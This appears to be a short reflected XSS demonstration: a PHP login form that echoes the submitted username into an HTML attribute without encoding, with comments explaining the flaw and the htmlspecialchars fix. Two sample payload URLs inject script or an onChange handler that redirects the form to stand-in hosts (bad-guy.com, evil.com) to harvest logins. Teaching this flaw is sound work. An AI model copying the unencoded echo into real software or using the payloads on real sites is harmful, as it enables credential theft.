XSS Example
XSS Example
<!--
  Login form used as a reflected XSS demonstration.
  The username field's value attribute is filled by echoing
  $_POST['username'] with no output encoding, so a double quote in the
  submitted value ends the attribute and whatever follows is parsed as
  markup or as extra attributes on the input element.
  Mitigation: encode at the point of output for the HTML attribute
  context, e.g. htmlspecialchars($_POST['username'], ENT_QUOTES, 'UTF-8').
  Removing only angle brackets is not sufficient, because a quote alone is
  enough to add an event handler attribute, and no tag is needed.
  NOTE(review): this code reads $_POST, while the sample requests shown
  after the form pass username in the query string; confirm which request
  parameter the original demo actually read.
  NOTE(review): no closing form tag is visible in this listing; presumably
  it was lost in extraction.
-->
<form action=
"login.php"
method=
"POST"
>
User: <input type=
"text"
name=
"username"
value=
"<?php echo
$
_POST['username']; ?>"
/>
Pass: <input type=
"password"
name=
"password"
/>
<input type=
"submit"
name=
"Submit"
value=
"Submit"
/>
./?username="><script> document.forms[0].action='http://bad-guy.com/harvest.php';
</script><x x="
./?username=" onChange="document.forms[0].action='http://evil.com/harvest.php';